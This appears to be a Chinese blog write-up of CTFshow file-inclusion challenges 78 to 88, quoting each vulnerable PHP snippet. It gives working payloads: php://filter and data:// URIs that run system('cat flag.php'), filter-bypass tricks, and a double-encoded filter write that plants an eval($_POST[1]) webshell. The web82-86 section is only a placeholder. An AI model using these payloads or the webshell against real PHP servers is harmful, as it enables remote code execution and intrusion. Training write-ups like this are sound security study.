CTFshow web 文件包含

最新推荐文章于 2024-05-12 23:02:18 发布
最新推荐文章于 2024-05-12 23:02:18 发布
阅读量383 收藏
点赞数
文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56993542/article/details/120788622
版权

web 78


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

文件包含伪协议,没有过滤。

?file=php://filter/read=convert.base64-encode/resource=flag.php

拿到flag的base64编码,直接去解码。

web 79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这里过滤了php,将“php”替换成“???”,这里可以用data协议

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs+

然后直接查看源代码,拿到flag。

web80-web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

抓包,进行大小写绕过。

然后直接查看flag

web82-web86

在这里插入代码片

web87

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

这里可以看到有die函数,需要对url二次编码绕过。

php://filter/write=convert.base64decode/resource=123.php

将上面的代码进行二次编码,得到

%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%33%32%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30

将"<?php eval($_POST[1]); ?>"进行base64加密得到PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==
但PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==前面要加上两个a,因为base64算法解码时是4个byte一组,所以给他增加2个“a”一共8个字符。这样,"phpdie"被正常解码,而后面我们传入的123.php的base64内容也被正常解码

然后查看文件,发现了flag

直接cat打开flag。

web88

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

可以发现,php黑名单没有过滤";",所以可以用data协议
将 <?php system('ls');?>进行base64加密,有因为php过滤了"=",所以要将加密的内容中等号删除IDw/cGhwIHN5c3RlbSgnbHMnKTs/Pg==得到IDw/cGhwIHN5c3RlbSgnbHMnKTs/Pg

然后发现了flag
<?php system('cat fl0g.php');?>base64加密IDw/cGhwIHN5c3RlbSgnY2F0IGZsMGcucGhwJyk7Pz4=
强调等号IDw/cGhwIHN5c3RlbSgnY2F0IGZsMGcucGhwJyk7Pz4

希望重逢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web入门-文件包含
wo41ge的博客
11-28 3284
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow文件包含练习2
qq_61109509的博客
02-11 2084
目录 web78 解法一 解法二 web79 解法一 解法二 web80 web81 web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 解法一 用include包含 /?file=php://filter/read=convert.base64-enc...
Web文件包含
最新发布
q
05-12 955
包含文件被当作当前的语言去代码执行漏洞原因:1.使用文件包含函数2.包含文件可控分类:1.本地包含:​ 有文件利用:配合文件上传​ 无文件利用:​ 1.包含日志文件​ 2.包含session文件​ 3.伪协议利用2.远程包含:公网服务器自定义文件差异:代码过滤, allow_url_include配置开关白盒发现:包含函数黑盒发现:主要观察参数传递的数据和文件名是否对应。
CTFshow web入门——文件包含
小元砸的博客
02-07 3409
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 3915
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
CTFSHOW文件包含
Yb_140的博客
04-06 4523
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 文件包含函数: 函数 区别 require() 在包含的过程中如果出现错误,会直接报错并退出程序的执行 include() 在包含的过程中如果出现错误,会抛出一个警告,程
CTFSHOW web193 left标注盲注脚本
05-04
其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
CTFshow 文件包含 78-88&116-117
Landasika的博客
05-17 1048
目录 web78web79web80方法一、http://远程包含方法二、include包含日志web81web82-86:条件竞争web87*web88web116web117 web78 if(isset($_GET['file'])){ $file=$_GET['file']; include($file); }else{ highlight_file...
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 564
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1906
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
CTFSHOWweb入门文件包含
7ruth0hn的博客
07-23 1534
CTFSHOWweb入门文件包含 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 没有过滤,一开始想直接包含flag.php,发现一片空白。使用php://filter伪协议读取flag.php内容,进行base64解码得到flag。 payload: ?file=php://filter/convert.base6
CTFshow——文件包含
D.MIND 的博客
02-07 2136
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
ctfshow_文件包含
qq_45951598的博客
03-27 331
文章目录WEB78web79 WEB78 没什么好讲的 payload:?file=php://filter/read=convert.base64-encode/resource=falg.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__F
ctfshow文件包含
njh18790816639的博客
04-11 1389
web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 要用php伪协议php://filter来构造payload!!! 首先这是一个file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base
web入门 文件包含
博客地址 www.sec0nd.top
04-13 298
文章目录web78web79web80web87web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 最简单的php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php 再base64解码可得flag web79 &lt
ctfshow web入门文件包含
05-24
我不确定你在问什么,但如果你是在问CTF中的Web入门题目,它可能包含以下内容: 1. 源代码:包含了网站的HTML、CSS和JavaScript代码,以及后端服务器脚本代码。 2. Robots.txt文件:该文件包含网站的爬虫指令,告诉爬虫哪些页面可以被访问,哪些不可以。 3. .htaccess文件:该文件包含了一些服务器配置信息,比如重定向和安全设置等。 4. 网站地图:该文件列出了网站的所有页面和链接,以便搜索引擎和用户能够更好地浏览网站。 5. Cookie:一些Web题目可能需要你使用cookie来获取敏感信息或者进行认证。 6. SQL注入:一些Web题目可能需要你使用SQL注入来获取敏感信息或者执行恶意代码。 7. 文件上传:一些Web题目可能需要你上传恶意文件来获取敏感信息或者执行恶意代码。 这只是一些可能的内容,不同的Web题目会有不同的挑战和难度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值